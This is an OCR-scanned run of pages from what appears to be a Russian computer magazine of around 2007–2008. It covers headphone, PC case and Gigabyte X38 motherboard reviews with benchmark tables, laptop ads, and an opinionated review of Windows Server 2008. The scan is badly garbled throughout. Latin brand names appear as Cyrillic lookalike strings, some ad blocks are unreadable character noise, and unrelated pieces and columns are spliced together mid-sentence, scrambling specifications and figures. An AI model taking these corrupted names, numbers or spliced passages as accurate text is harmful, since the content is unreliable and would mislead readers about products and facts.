| Процессор: Іпіеі Соге 2 Рио Е6700. Память: 
2x1024 Мб РРВЗ, СогзаігТѵѵіпЗХ2048-10б6С7. Винчестер: 80 Гб,5еада1е 
Ваггасиба 7200 грт, ШЕ .Видеокарта: А51І5 ЕАХ1900ХТХ, 512 Мб СОйВЗ. 



Результаты тестирования 



ЗРСМагк'05 (СРВ Теві): 6785. 
РСМагк'05 ІМетогуТеві): 8022. Р.Е.А.Р. МахСІиаІііу, 1024x768: 129 РР5. 
Кодирование бате 3.97: 2 мин 35 сек. Кодирование РіѵХб.2: 5 мин 58 сек. 
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Технические характеристики: 

Интерфейс связи с компьютером: 115 В 1.1, 2.0 
Количество каналов: 6 (5.1 ) 

Тип головок: динамические с сопротивлением 16 Ом при 1 кГц, централь- 
ные динамики — 32 Ома при 1 кГц 

Диапазон воспроизводимых частот: 50 — 20 000 Гц 
Уровеньдавления звука: 89дБ+/-з дБ при 1 кГц 
Масса без шнура: 386,6 г 
Длина шнура: 240 см 

Звуковой чипсет: С-Месііа СМ6206 5.1 ЗоипсІ 

Частота дискретизации: 16 бит 44,1 кГц, совместимость с 48 кГц 

Габариты модуля звуковой карты: 34x18x91 мм 

Потребляемое питание: минимальное — 3,3 В, 150 мА, нормальное — 5 В, 
500 мА 



СооІегМаяТег 
С08Ш08 КС 1000 

Отличный еАТХ-корпус 



Технические характеристики: 



2а1тап ТЬеаІге 6 
2М-К86РІІ8В 

Наушники для портативного 
кинотеатра 



Форм-фактор: еАТХ 

Количество мест для дисководов 5,25": 5 шт 

Количество мест для дисководов 3,5": внешних — 1 шт, внутренних — 6 шт 
Количество вентиляторов: 120 мм — 3 шт 

Количество свободных мест для установки вентиляторов: 120 мм — 1 шт 
Дополнительные порты на корпусе: 115 В — 2 шт, РігеѴѴіге — тіс — 1 шт, 

еаг — 1 шт, еБАТА — 1 шт 
Дополнительно: ручки для переноски 
Габариты : 266x598x628 мм 
Вес: 19 кг 




1. Дизайн этого устройства не дает пройти мимо него — сразу возникают 
ассоциации с шатлами, буранами и прочими космическими челноками. 

2. Такой эффект достигается благодаря особому сочетанию цветов и форм 
корпуса. 

3. Но космос — это еще и высокиетехнологии, предельная насыщенность 
функциями. Тут СооІегМазІегСозтоз НС 100 тоже не отстает. 

4 . Устройство вместительное — 5 отсеков для пятидюймовых дисководов и 
семь для трехдюймовых. 

5 . Учитывая то, что флопиками мы уже не пользуемся, а кардридеры стали 
универсальными, то одного внешнего 3,5"-вывода будет вполне достаточно. 

6 . Кстати, все накопители можно оченьудобно смонтировать без примене- 
ния инструментов. 

7 . Система охлаждения представлена заранее установленными четырьмя 
120-мм вентиляторами. 

8 . Корпус достаточно габаритен и тяжел, учитывай это. 

9 . Впрочем, на нем имеются удобные ручки для переноски. 



Выходная мощностьзвуковой карты: 0,3 Вт на каждый канал 




1. Интерфейс И5В позволяетоперативно подключить наушники клюбому 
компьютеру с ОС ѴѴіпсІоѵѵзХР или Ѵізіа без установки каких-либо драйве- 
ров. Управляющая программа, которая поставляется на диске вместе с 
наушниками, умеет переназначать каналы, а также выполняет функцию 
эквалайзера. 

2 . Шесть динамических головок, потри в каждом наушнике, обеспечивают 
насыщенное звучание в режиме зиггоипсі. Звук на самом деле хороший, 
верхов не хватает, но для просмотра фильмов вполне достаточно. Корпуса 
наушников имеютбольшой объем, за счет этого звук очень четкий. 

3. Наушники складываются внутрь оголовья, что делает их довольно ком- 
пактными. Такие наушники можно взять с собой куда-нибудь и посмотреть 
йѴй на ноутбуке. 

4 . Кнопки регулировки громкости, встроенные в корпус звуковой карточки, 
сделают просмотр фильма еще более комфортным. 

0 

1. Не очень порадовала шумоизоляция наушников. Используя их в шумном 
месте, придется делать звук погромче. 

2 . Диапазон регулировки громкости с пульта недостаточен. При уменьше- 
нии громкости та плавно снижается, а затем звук резко пропадает. В связи 

с этим иногда приходится дополнительно регулировать громкость в плеере. 
Крометого, пара дополнительных кнопокдляуправления воспроизведени- 
ем была бы весьма уместна. 

3. Басы телефоны воспроизводятудовлетворительно, но не более того. А 
при попытке поднять басы эквалайзером, они начинаютхрипеть. 
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Тестирование Ні^Ь-Еші 



системной платы от Сі^аЬуІе 



протестировать новую системную плату Сі§аЪуіе Х38-Оф6, осно- 
ванную на последнем чипсете ІпТеІ. 



Технические характеристики: 



Поддерживаемые процессоры: 



Процессорный разъем: 



Іпіеі Репііит 4, Іпіеі Репііит Э, Іпіеі 
Репііит ЕЕ, I піеі Сеіегоп-Э, Іпіеі Соге 2 йио, Іпіеі Соге 2 ОиасІ 
І_ѲА 775 

I піеі Х38 (северный мост) + Іпіеі ІСН9Р 
Д 8 Гб максимум, 4 слота поддержки 0ЭР2- 533/667/800/1 066 
2х РСІ-Ехргевв XI 6, Зх РСГЕхргевзХІ 

2 _ 



Слоты РСІ-Ехрге55 



Слоты РСІ : 



лись разработкой действительно Ні§;Ь-Епс1 чипсета под 



ной маркой. В результате вышел Іпіеі Х38, которого мы ждали уже 



давно. Выпущенный ранее в той же линейке Іпіеі Р35 является 



решением лишь среднего уровня. Теперь же у нас есть возможность 



$295 



До сих пор топовые решения для процессоров Іпіеі базировались 



на наборе системной логики от ХѴГОІЛ. Примером может служить 
ѴШІАпРогсе 680І5Ы. 

Чтобы исправить это положение вещей, инженеры Іпіеі 



ТЕСТОВЫЙ СТЕНД: 

Процессор: Іпіеі Соге 2 йио Е6850 
Память: 2х 1 Гб, Кіпдьіоп НурегХ ООР2-800 
Видеокарта: А51І5 ЕМ88006ТХ, 768 Мб 
Винчестер: 80 Гб, Зеадаіе Ваггасиба 
7200 грт, ЮЕ 

Блок питания: 450 Вт, Ріоьіоп І_ХРѴѴ-450 



ЕВГЕНИЙ попов 

6ідаЬу(еХз8-006 



Подключение носителей: 



Расширение: 



1 1 х РАТА, 8х 5 АТА II, 1 хРЭй 

1 1 2 115В (8 установленных, 4 дополнительных), Зх ІЕЕЕ 1394 
^установленных, 1 дополнительный), 2 контроллера Еібегпеі 

[Іпіеі Н ід Ь Оеііпіііоп Аибіо, 8-канальный кодек Реаііек АЕС889А 
ВАТХ- стандарт, 244x305 мм 



Форм-фактор: 



омпания бідабуіе 
все свои платформы 
собираетнате кстол ите 
синего цвета. Рассмат- 
риваемый вариантне исключение. 
Даже при беглом осмотре легко 
заметить, что инженеры освободили 
околопроцессорное пространство, 
так что проблем с монтажом системы 
охлаждения с низкой посадкой быть 
не должно. Отдельного внимания 
заслуживает система охлаждения. 
Здесь мы имеем сложную цельно- 
медную конструкцию. Все сильно- 
греющиеся элементы прикрыты 



радиаторами, которые соединены 
друге другом тепловыми трубками. 
Также интересно, что для более 
эффективного теплоотвода под 
южным мостом, стыльной стороны 
платы, установлена металлическая 
пластинка небольшого размера. А в 
районе северного моста и про- 
цессорного разъема монтирована 
пластина больших габаритов. Такой 
подход к организации охлаждения 
производитель назвал Сгаіу Сооі. 



>> Функции ВІ05 



памяти вынесены в отдельное 




меню. Здесь есть все, что необ- 
ходимо для конфигурирования 
параметров и оптимизации работы 
подсистемы, однако отметим, что 
новый чипсет Х38 не поддерживает 
понижающие множители частоты. 
Это значит, что обычными планка- 
ми при серьезном разгоне не обой- 
тись и придется покупать оверк- 
локерские решения. В остальном 
мониторинг параметров и другие 
опции, необходимые энтузиасту 
в ВІ05, присутствуют и могут быть 
использованы в должной мере. 



>>Методика тестирования 



В качестве общихтестов мы про- 
водили кодирование аудиопотока 
в іипрЗ (І_ате МРЗ, ѵег. 3.98 Веіа 3), 
кодирование видео (ЭіѵХ 6.6.1 ), 
архивирование объемного элемента 



с помощью ѴѴіпРаг и обработку изоб- 
ражений с помощью АбоЬе РЬоІозЬор 
С52. Из игр мы выбрали Зегіоиз 5ат 
2 и Оиаке 4, а в качестве синтетичес- 
кого теста был произведен прогон на 
ЗйМагк’Об (тестСРІІ). Для сравнения 
мы взяли одну из популярных плат- 
форм на базе предыдущего чипсета 
Іпіеі— М5І Р35 Эеіихе. 



>> Выводы 



| Изучив устройство, 
мы можем подвести некоторые итоги 
и отметить особенности, присущие 
плате 6ідаЬуІеХ38-006. Она характе- 
ризуется высокой стабильностью ра- 
боты и улучшенной производитель- 
ностью. Инженеры ѲідаЬуІе очень 
удачно организовали охлаждение 
и систему питания, что определило 
высокий разгонный потенциал новой 
платы. т 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ 


СідаЬуІе Х 38-006 (ІпІеІХзв) 


М5І Р 35 Оеіихе (Іпіеі Р 35 ) 


Оиаке 4, 1024x768, N 0 АА, N 0 АР, РР5 


131 


129 


Зегіоиг 5ат 2, 1 024x768, N 0 АА, N 0 АЕ, ЕР5 


159 


156 


Кодирование І_ате, мин:сек 


1:39 


1:38 


Кодирование ЭіѵХ, мин:сек 


1:11 


1:12 


Конвертирование изображений АбоЬе РЬоІозЬор С5 2, мин:сек 


2:01 


2:02 


АрхивированиеѴѴіпРагЗ.60, минюек 


3:18 


3:17 


ЗОМагк'Об, СРІІ Тезі, Магкз 


4302 


4257 
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Процессор ІпіеІ© Соге ™ 2 Оио Т5600 
Беспроводная сеть №іРі 
Привод ОѴО-ЯШ 
I Гарантия 3 года 



Септгіпо V 

Рио 



Соге 2 Оио 



тоий йлктнеп рой аизімЕзз 



Ноутбук 30® $№15 
с технологией Іпіеі® Сепігіпо® Оио 



ѵммѵ.5(І2Ь.ги 



для мобильных ПН позволит Вам наслаждаться цифровыми 
развлечениями нового уровня к буди сопровождать Вас повоюду. 



где купить- — 

4, Мним, а 40 ЦйфВЙ 7Э'Э-01Н. ЗАО солкнг Ксип№:«ы *»Т СЖгіСі»'. 1 495 ^ 753-- В 1 3 1 . Ш С а іцр ірГйГі В«И& ■» МС> 1 ИС<«и рлднррыйр;* 
МсрШяоі швер* Мо*ійС4И* р і и не п н-ю >■ л* » играны 9.'32 и В/33, АЧІ Слтримп. дита чі Мй’НчСчом |іадиорын»»(ТК 'Мятш«иВ’}: Лярве 
ГщнМ-цчРІ шРЕРІ. ІПІДІнй* 14 ГбрГ йіііс ИЕРТ1 Ь-2 V ІІ-Б ЕШО ' МЛ -Ивы ЛьйТЕР - ЛЕН гіН грддгйгігі прпсадкі. Дйи В4. ийріІѴ-: 'В’.вфЯЕ 201. ТіАЕ-фвНЫ 
|«35) I» 0673. 1И-И34 НТ* ІИ' уіі РвГйВІ й юр '.2 КВ. (435 1 34 7-2 В -43 74МЭВа 'НаВМ' Г(4М] 744- ГЕ 4В НН1*рн*Г ІІІГЛИВ 'ЖіЬріМІ.ПГ 
І.|*М) 7 72 'ВО Г 5 31 5 -620 5 Сйіь МІГІЭйчВІ 'Цифре'. ЕіГрІІгіЗчйВРвгііі ПрбйІД Д 7. ТЦ ТВ О' уд БйЛьшІІ ЧЕГЕИУикИпВ. 1 . ТЦ 'Ч* рі иуиій И" 
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ОТѴѴІГКІОѴѴЗ 



ОБЗОР НОВОЙ СЕРВЕРНОЙ ОПЕРАЦИОННОМ СИСТЕМЫ ОТ МІСР050РТ 



В то время как Ілпих в стремлении догнать и перегнать перенимает худшие черты 
ѴѴІпсІоѵѵз, МісгозоіД активно заимствует все лучшее из мира никсов, реализуя их в своих 
серверных системах. Во всяком случае, Зегѵег 2008 намного больше похож на ІШІХ, чем 
последние дистры Ілпих. МісгозоІІ действительно проделала большую работу, которая 
стоит того, чтобы на нее взглянуть. 



рое кт Зегѵег 2008 (ранее известный под кодовым именем 
І_опдЬогп) стартовал еще до выпуска Зегѵег 2003, но 
первая бета-версия появиласьтолько в июле 2005 года, 
вторая и третья беты вышли меньше чем через год — в 
мае 2006 года и в апреле 2007 года соответственно. И вот в сентябре 
2007 года МісгобоЙ начала раздавать Зегѵег 2008 Кеіеазе СапсІісЫе 0, 
или сокращенно КС0, что переводится как «кандидат в релизы нулевой 
степени готовности». Финальная версия должна выйти где-то в районе 
первого квартала 2008 года. Если верить прогнозам МісгобоЙ, это 
случится 27 февраля. 

Но даже в настоящий моментпопулярность5егѵег2008такова, что под 
ним работает по меньшей мере 2600 интернет-серверов (для сравнения: 



под управлением ѴѴіпсіоѵѵб 2000 работает порядка 5 миллионов серве- 
ров). Отчасти такая статистика объясняется тем, что бета-версия Зегѵег 
2008 распространяется подлицензией 6о І_іѵе, нетребуя отчислений, и 
уже достаточно стабильна для использования в некритически важных 
областях, к которым, в частности, относятся ѵѵеЬ-сайты мелких компаний 
С учетом свойственной серверному рынку консервативности, потребу- 
ется не год и не два, чтобы Зегѵег 2008 потеснил Зегѵег 2003/ѴѴі псіоѵѵз 
2000, однако достаточно большое количество хакеров ставит его на 
рабочие станции уже сейчас. Автор, распотрошивший ядро І_опдбогп’а 
под дизассемблером, настолько проникся к нему уважением, что даже 
загорелся идеей поставить его на соседнюю машину (основная работает 
под управлением ѴѴіпсіоѵѵб 2000). 
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Консольуправления файрволом ѴѴіпсІоѵѵз 2008 



В ЧТОКЧЕМУ 

Бегѵег 2008 основан на ядре Ѵізіа (которое в свою очередь основано 
на коде Бегѵег 2003) и потому включает в себя все основные ее фичи, в 
том числе переписанный с нуля ТСР/ІР-стек, содержащий неизвестное 
науке количество новых дыр, улучшенную поддержку динамической 
памяти, файла подкачки, ввода/вывода, рандомизацию адресного 
пространства и контроль целостности кучи для защиты от переполняю- 
щихся буферов и т. д. 

Что изменилось в 5егѵег2008? Ну, в общем-то, кое-что изменилось. 
МісгозоЙ продолжает затягивать гайки, усиливая безопасность и 
оптимизируя систему под работу с мощным железом, что совсем не идет 
на пользу БОНО-серверам. Болеетого, МісгозоЙ открыто признает, что 
код Бопдбогп’а совсем не оптимизирован под файловый сервер (а в 
БОН О-сегменте как раз и доминируют файловые серверы!), так что в 
практическом плане оптимизация превращается в «пессимизацию», и 
конечные пользователи вынуждены вкладывать деньги в железо для по- 
лучения той же самой производительности, что и на Бегѵег 2003/ѴѴіпсіоѵѵ5 
2000. Ну и чего это ради?! 

Но оказывается, не всетак просто и очевидно. Несмотря на все недо- 
статки БопдЬогп'а, интерес к нему продолжает расти. К его достоинс- 
твам в первую очередь хочется отнести доработку командной строки, 
позволяющую выполнять 99% операций с удаленной машины (то есть 
без физического доступа ксерверу), а также улучшенные механизмы 
мониторинга, диагностики ошибок и восстановления системы после 
падений. Наконец, 5егѵег2008 поддерживаеттехнологии аппаратной 
виртуализации Іпіеі/АМБ, известные под кодовыми именами РасіЯса, 
Бііѵегѵаіе/Ѵапсіегрооі и позволяющие запускать гостевые операционные 
системы практически без потери производительности. 

Узкие рамки журнальной статьи не позволяют нам подробно рассказать 
обо всех нововведениях, поэтому мы решили остановиться на самых 
интересных. 



Что еще нового 

В Штс1оШ5 2008 

Зегѵег 



Самовосстанавливающаяся ГѵПГРЗ. 



I Возникающие ошибки в файловой 
системе всегда были большой проблемой для Винды. Однако синего эк- 
рана скандиска в ѴѴіпбоѵѵз 2008 Зегѵег мы не увидим. В системе встроен 
специальный системный сервис, который в фоновом режиме следит за 
состоянием файловой системы и в реальном времени исправляет все 
ошибки (без перезагрузки!). 

2 Взамен порядком устаревшего протокола 5МВ, 
для передачи данных по сети теперь будет использоваться значительно 
усовершенствованный ЗМВ2. По заявлению Руссиновича, ѴУ32К8 на 
медиасервисах будет работать вплоть до 30-40 раз быстрее, чем ѴѴіпсІоѵѵз 
2003. Серьезный результат! 

Щ Новая оболочка для командной строки отныне включена 
в систему по умолчанию. В ее состав ходит более 130 средств и встро- 
енный язык программирования, на котором будет возможно писать 
многочисленные системные сценарии. 

Щ Разработчики приложили немало 
усилий, чтобы объединить управление всеми компонентами сервера в 
одной графической консоли. Новый подход требует привыкания, но, в 
конечном счете, администрировать сервер (ПИЗ, ЭНСР, АЛ, НТТР и т.д.) 
действительно стало проще и быстрее. 



из них выглядит просто ужасно (кто застал М5-Б05, тот помнит). Однако 
при желании можно форсировать работу ядра и в текстовом режиме, что 
ощутимо увеличиваетбыстродействие на слабых машинах. 

ѴѴіпсІоѵѵз — совсем другой зверь. Оконная подсистема интегрирована в 
ядро и является неотъемлемой частью подсистемы ѵѵіп32-АРІ, которую 
отодрать от ядра оченьтрудно. Собственно говоря, понятие «ядра» 
совершенно неприемлемо к ѴѴіпсІоѵѵз, поскольку этих ядер у него... ну, 
скажем так, намного больше одного и все они переплетены в тугой клу- 
бок, работающий по принципу «не трогай, а то развалится». Какой вред 
от интеграции графической оболочки в ядро? В общем-то, никакого. Да 
и ресурсов тратится намного меньше, чем в Споте/ КОЕ (популярные 
оболочки для ІІЫІХ). Недостаток ѴѴіпсІоѵѵз в том, что многие действия 
можно выполнить только через графическую оболочку, что требует фи- 
зического доступа к серверу или установки дополнительных програм- 
мных пакетов для удаленного администрирования, но в ряде случаев 
не помогают даже они. Печально, да? 

В Бегѵег 2008 появился режим зегѵег соге, позволяющий устанавливать 



Удобноеуправление сервером через одно-единственное окно 



^ 5ЕКѴЕКС0КЕ 

І_іпих и хВББ, изначально ориентированные на работу с командной 
строкой, прочно оккупировали рынок Іоѵѵ-епсІ серверов, мощностей 
которых недостаточно для поддержки графической оболочки, не явля- 
ющейся частью ядра и устанавливаемой отдельно. По желанию. Или не 
устанавливаемой. Это уже какзахочет администратор. В любом случае 
мы получаем полнофункциональный сервер и все необходимые нам 
программы будут запускаться нормально, даже если мы захотим принять 
почту, полазить по ѵѵеЬ’у или отредактировать офисный документ, за- 
писанный в формате МБѴѴогб. Да-да! Все это можно сделать в тексто- 
вом режиме, который на самом деле... графический. Ядро переходит в 
графический режим еще на самой ранней стадии загрузки, в чем легко 
убедиться, нажав кнопку I піо на мониторе. Спрашиваешь, зачем это 
никсы делают? А как еще иначе работать с несколькими кодировками 
сразу? Да и текстовых режимов (стандартных) немного, и большинство 
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Вполне привычный для пользователя интерфейс 
ѴѴіпсіоѵѵб 2008 Зегѵег 



3 новой серверной Винде МісгобоЙ наконец-то интегрирует 
давно обещанный РоѵѵегЗЬеІІ 






> \ПІО 

Місгобо^ ѴѴіпсіоѵѵб 
Зегѵег 2008 
поставляется в 
пяти редакциях, 
поддерживающих 
как32-битные, так и 
64-битные системы. 
Подробное описание 
каждой редакции и 
их отличий можно 
найти в реклам- 
ных проспектах от 
М іеговой. Это тот 
редкий случай, когда 
они не врут. 




> СІѴСІ 

Бета-версия 
ѴѴіпсіоѵѵб Зегѵег 
2008, возможно, 
будет на нашем ОѴО. 
Не пропусти. 



систему без графической оболочки и без библиотеки .МЕТ 
Ргатеѵѵогк, управляя сервером через командную строку или 
удаленно через консольуправления (МісгобоЙ Мападетепі 
СопБОІе). При чтении рекламных обзоров создается 
впечатление, что МісгобоЙ наконец-то отодрала оконную 
подсистему от ядра, подарив нам чистый текстовый режим, 
которого все от нее так должно ждали. 

Увы, это всего лишь реклама. В зегѵегсоге действительно 
отсутствует ѴѴіпсіоѵѵб Ехріогег, но графическая подсистема 
никуда не делась, и АРІ-функции 1)5ЕВ32/6йІ32 продолжают 
работать как ни в чем не бывало, пожирая системные ресурсы. 
Аналогичного эффекта можно добиться и на Зегѵег 2003, 
выбрав в опциях загрузки режим соттапб рготрІюпІуѵѵкЬ 
пей/ѵогкіпд виррогк Разница между Зегѵег 2008 и Зегѵег 2003 
втом, что зегѵегсоге не ставит Ехріогег и .ЫЕТ на винчестер, 
экономя пару сотен мегабайт дискового пространства. Какое 
большое достижение! Как будто нельзя снести Ехріогег и вруч- 
ную, превратив Зегѵег 2003 в Зегѵег 2003 Соге. На самом деле 
руками можно сделать гораздо больше, в том числе и отодрать 
графическую оболочку, поскольку сетевые сервисы начинают 
работать еще до ее загрузки. Однако это не превратит Зегѵег 
2003/5егѵег2008 в И N IX, поскольку ряд действий осуществля- 
ется только в графическом режиме (например, управление 
оборудованием). 

Но все же зегѵегсоге — это большой шагвперед, итеперь нам 
уже не придется сразу же после установки сервера браться за 
метлу и выметать все ненужное. Впрочем, ненужного в зегѵег 
соге по-прежнему много. Это и лишние службы, и неиспользуе- 
мые системные компоненты, ит. п. 

г ВИРТУАЛЬНЫЕ МИРЫ ВИРТУАЛЬНЫХ ОСЕЙ 

Огромная популярность виртуальных машин типа ѴМѵѵаге 
наконец-то подвигла разработчиков процессоров на 
поддержку аппаратной виртуализации, позволяющей эму- 
лировать выполнение машинных команд практически без 
потери производительности. 

У АМ 0 эта технология называется РасіЛса (АіЫоп 64/Тигіоп 
64/ОрІегоп], у I пЕеІ — Зііѵегѵаіе (Капіиті/Ѵапсіегрооі (Репбит 
4), и она реализована практически на всех процессорах, выпу- 
щенных после середины 2006 года. 

В состав Зегѵег 2008 входит встроенный виртуализатор, 
устанавливаемый опционально и сконструированный на базе 
эмулятора МісгобоЙ Ѵігіиаі РС (который можно приобрести 
отдельно за дополнительную плату и установить, например, на 



ѴѴ2К), что позволяетзапускать несколько операционных систем 
одновременно! Причем поддерживаются нетолько оси от 
МісгобоЙ, нотакже ІІЫІХ-клоны: Ыпих.хВЗО ит. д. Естественно, 
на виртуальных машинах можно запускать и саму ѴѴіпсіоѵѵб, что 
очень полезно для вскрытия червей, обкатки подозрительных 
программ, полученных из сомнительных источников, или для 
различных экспериментов с системой, которая в худшем случае 
может грохнуть только виртуальный диск, на котором, кроме 
нее, нетничего ценного. 

Провайдеры могут использовать эмулятор для предоставления 
виртуального хостинга, позволяя клиента муста на вливать 
свои собственные операционные системы, что до этого было 
невиданной роскошью и стоило немереных денег. Аналогич- 
ным образом обстоят дела и с развертыванием отказоустойчи- 
вых систем. Теперь вместо приобретения резервного сервера 
достаточно запустить несколько виртуальных машин. Если 
упадет одна система, обработку запросов возьмет на себя 
другая. Естественно, эмулятор страхует только от программных 
сбоев, и потому в очень важных инфрастуктурах без аппарат- 
ного дублирования железа по-прежнему не обойтись, однако 
подобные инфрастуктуры занимаютсравнительно небольшую 
часть рынка, да и аппаратные отказы случаются не такуж часто. 
Главный минус виртуализатора — необходимость в апгрейде 



Какие компо- 
ненты включает 
Зегѵег 2008 Соге 

МісюзоЙ Раііоѵег СІизГег, 

№Гѵѵогк Ьоасі Ва1апсіп§, 

пародию на РОЗІХ-подсистему для ІЖІХ-приложений, 
МісгозоЙ ѴѴіпсіоѵѵз Васкир, 

МиМрайіІ/О, 

КетоѵаЫе Згога^е Мапа§етепЦ 
ѴѴіпсІоѵѵз ВШоскег Бгіѵе Епсгургіоп, 

Зітріе ЫеТѵѵогк Мападетепі: РгоНосоІ (ЗЫМР), 

ѴѴіпсІоѵѵз ІпГегпеі: Катіп§ Зегѵісе (ѴѴВМ5), 

ТеІпеГ-клиент, 

службу (ЭиаШуо^ Зегѵісе (С)оЗ). 
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РгргГідіо 

\ллллл/ . р г е з С і д і о . г и 



Ргезіідіо Аѵапіі 1770ѴѴ 

Магия 17” дисплея для работы и развлечений. 

Ноутбук Ргезіідіо Аѵапіі 1770ѴѴ с широкими мультимедийными 
возможностями - это новый уровень качества работы и цифровых 
развлечений. Широкоэкранный 17” дисплей. Широкие 
мультимедийные возможности: дискретная видеокарта, ТВ тюнер, 
функция Іпзіапі Оп. Полнофункциональная клавиатура с 
цифровыми клавишами, Кнопки быстрого запуска е-таіі, 
Интернет и управления ѵѵііі. 



Ргезіідіо Оаіа Заіе II - 

мобильный накопитель. 

Настоящее устройство РІид & РІау, которое легко подключается к 
любому компьютеру, имеющему ІІЗВ-порт, и позволяет получить 
мгновенный высокоскоростной доступ к данным. Кожаная 
оболочка черного или коричневого цвета придает устройству 
исключительную элегантность. Совместим с операционными 
системами Мае 05 и ѴѴіпбоѵѵз. 
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старого железа. Учитывая, что средний срокамортизации оборудования 
колеблется в диапазоне от трех до пяти лет, можно сделать вывод, что коли- 
чество серверов, оснащенных процессорами, выпущенными после середины 
2006 года, в настоящий момент крайне невелико. Реально материнские платы 
и серверы с поддержкой аппаратной виртуализации появились на отечест- 
венном рынке в начале 2007 года, и цена на них все еще достаточно велика 
для их массового внедрения. Народ предпочитает брать слегка устаревшее 
железо по бросовой цене. 

Кстати, о ценах. М іеговой до сих пор не определиласьс политикой лицензи- 
рования своих систем, запущенных на виртуальных машинах, и в настоящий 
момент необходимо платить за каждую инсталляцию, включая виртуальную. 
Очевидно, что аппаратная эмуляция позволяет использовать базовую опера- 
ционную систему как фундамент для всех остальных. Но платить за фундамент 
какза полнофункциональную ось, не используя и 10% ее возможностей, 

— смешно, если не сказать обидно и грустно. Намного выгоднее возложить эту 
задачу на РгееВЕЮ или І_іпих, под которые есть куча бесплатных эмуляторов, 
поддерживающих аппаратную виртуализацию (например, ХЕЫ), и которые 
позволяютзапускать5егѵег2008 как гостевую операционную систему, в 
результате чего мы платим всего лишь за одну инсталляцию, а не за две. 

Н РШб’Ы’РКАУ 

Вот раньше, годах этак в 60-х, все было классно — вех, сігидз & госк'п’гоіі. А 
сейчас? 5ихх, Ьидз & ріид'п’ріау... Точнее, ріид'п’ргау. В смысле «включи и 
молись». И ведьестьо чем помолиться! Ведь может зависнуть все на фиг. 

И ладно, если мы что-то к 115В подключаем, а если наращиваем память или 
вставляем еще один процессор? Ачто, при поддержке материнской платой 
технологии Ьоі-ріид еще и нетакое возможно. Правда, это должна быть очень 
крутая плата, обслуживающая критически важный ресурс, не допускающий 
даже плановой (эх, слово-то какое!) перезагрузки. И стоять на такой, скорее 
всего, будет ОЫХ или другая «правильная» операционная система, поставля- 
емая вместе с машиной. 

ѴѴіпсІоѵѵз (вплотьдо Висты) определяла количество процессоров и объем 
оперативной памяти на ранних стадиях загрузки своего ядра и не допускала 
никакой возможности изменения конфигурации в дальнейшем. Более того, 
переходе однопроцессорной на многопроцессорную машинутребовал не 
только перезагрузки, но еще и переустановки системы. Теперьже и процес- 
сор, и память включены в общее дерево Ріид апб Ріау устройств, а это значит, 
что они могут подключаться/отключаться на лету без перезагрузки. Теорети- 
чески. Практически же реализованотолько распознавание новыхустройств, 
но ядро 5егѵег2008 ни морально, ни физически не готово кисчезновению 
одного или нескольких процессоров или планок оперативной памяти. То есть 
заменить память/процессор на лету мы все равно не сможем. А наращивать 
их количество... чисто слотов на матери не бесконечно, да и к тому же для 
достижения максимальной производительности следует уста на вливать 
память/процессор с идентичными характеристиками, а если они отличаются 
отуже установленных, останов системы все равно неизбежен, хоть грызи 
зубами лед. 

Ктомуже, какуже говорилось, в критических и нфрастуктурах ѴѴіпсІоѵѵз 
практически не применяется, и сучетом астрономической стоимости железа, 
поддерживающего горячую замену процессоров и оперативной памяти, 
намного дешевле купить резервный сервер, чтобы спокойно останавливать 
основную систему для планового апгрейда. Опять-таки 5егѵег2008 выпол- 
няет распределение ресурсов (сколько-то памяти отдать под системный 
кэш, столько-то — под все остальное) на ранних этапах загрузки и не меняет 
его в дальнейшем, даже если мы увеличим количество ПАМ. Но это еще что! 
Подумаешь, неэффективное использование памяти! Намного хуже то, что 
наращивание оперативной памяти приводит к невозможности сохранения 
полного дампа ядра, которое требует, чтобы файл подкачки был равен объему 
ПАМ или превышал последний, а максимальный размер файла подкачки 
устанавливается при загрузке системы и поумолчанию равен 1 ,5*НАМ. 
Изменение размеров файла подкачки требует обязательной перезагрузки. 

То есть, если мы увеличим объем памяти более чем на 50%, создание полного 
дампа ядра станет невозможным! А без полного дампа ядра разобраться, 
почему вспыхнул голубой экран смерти, намного труднее, чем с ним. Так что 
эта технология еще сыра, и МісгозоЙ’у тут есть еще над чем поработать. 




ѴѴіпсіот 5егѵег 2008 

Н ШТЕІ. ПОД УГРОЗОЙ ВЫТЕСНЕНИЯ С РЫНКА! 

Зегѵег 2008 — это последний сервер в линейке ѴѴіпсІоѵѵз і\ІТ, поддер- 
живающий х86. Дальше пойдуттолько 64-битные версии (смотри блог 
разработчиков Висты: ѵѵіпбоѵѵБѵізІаЫод.сот/ ЬІодз/ѵѵіпсІоѵѵзѵізіа/агсЫ 
ѵе/2007/05/18/оп-64-Ьі1:-апс1-ѵѵіпс1оѵѵ5-сІ.іепі:.а5рх ). МісгозоЙ объясняет 
это своим стремлением сосредоточить все имеющиеся в ее распоряже- 
нии ресурсы на работе над одним ядром, чтобы не распылять усилия по 
ветру. Типа, самая преуспевающая компания мира настолько обнищала, 
что не может позволить себе такую «роскошь», как поддержка еще одно- 
го ядра. А вотхВБО и Біпих-системы портированы под сотни различных 
архитектур. Странно, не правда ли? Особенно если вспомнить, что х86 
— даже не одна из самых популярных, а самая популярная платформа на 
сегодняшний день. И делотут совсем не втом, чтоу МісгозоЙ денег/со- 
трудников не хватает или что для реализации очередной серверной 
версии позарез требуется как минимум 64 бита (что же это за монстр 
будеттакой?!). Все гораздо проще. 

64-битные версии построены сучетом последних веяний ОВМ, включая 
такие инквизиторские штуки, как обязательная подпись всех драйве- 
ров, невозможность модификации ядра и т. д. То есть все то, что позво- 
ляет Місгозо^ вытеснять неугодных игроков с рынка, одновременно с 
этим заигрывая с Голливудом и другими держателями авторских прав на 
медиаконтент, позиционируя ѴѴі псіоѵѵз как систему, защищенную от циф- 
рового грабежа. Естественно, при желании можно и контентеграбить, и 
ядро отмодифицироватьтак, что система ляжет и больше не встанет, но 
это уже хакерство... 

Интересно, что будет делать Іпіеі, ведь рынок 50Н0-серверов не просто 
широк, он огромен, как Атлантический океан, а позиции ІпіапіипгГа на 
нем выглядят довольно слабо и вообще неубедительно. Администра- 
торам придется переходить либо на хВ50/І_іпих, либо на АМй х86-64 
в связке с очередным творением от МісгозоЙ. Желающих перейти на 
ІІЫІХ-системы навряд ли окажется очень много (куда девать накоплен- 
ный опыт администрирования и за какие шиши перестраивать сло- 
жившуюся инфраструктуру?). А раз так, то АМБ становится практически 
единственной альтернативой. 

Выпускать «народную» версию Йапіит'а Іпіеі не сможетхотя бы потому, 
что он не совместим с х86. А зачем народу процессор, под которым не 
запускаются никакие программы? Скопировать х86-64 и добавить его 
в Репйит? Но это значит превратиться из лидера в догоняющего... В 
общем, над Іпіеі нависла не слишком-то приятная перспектива потери 
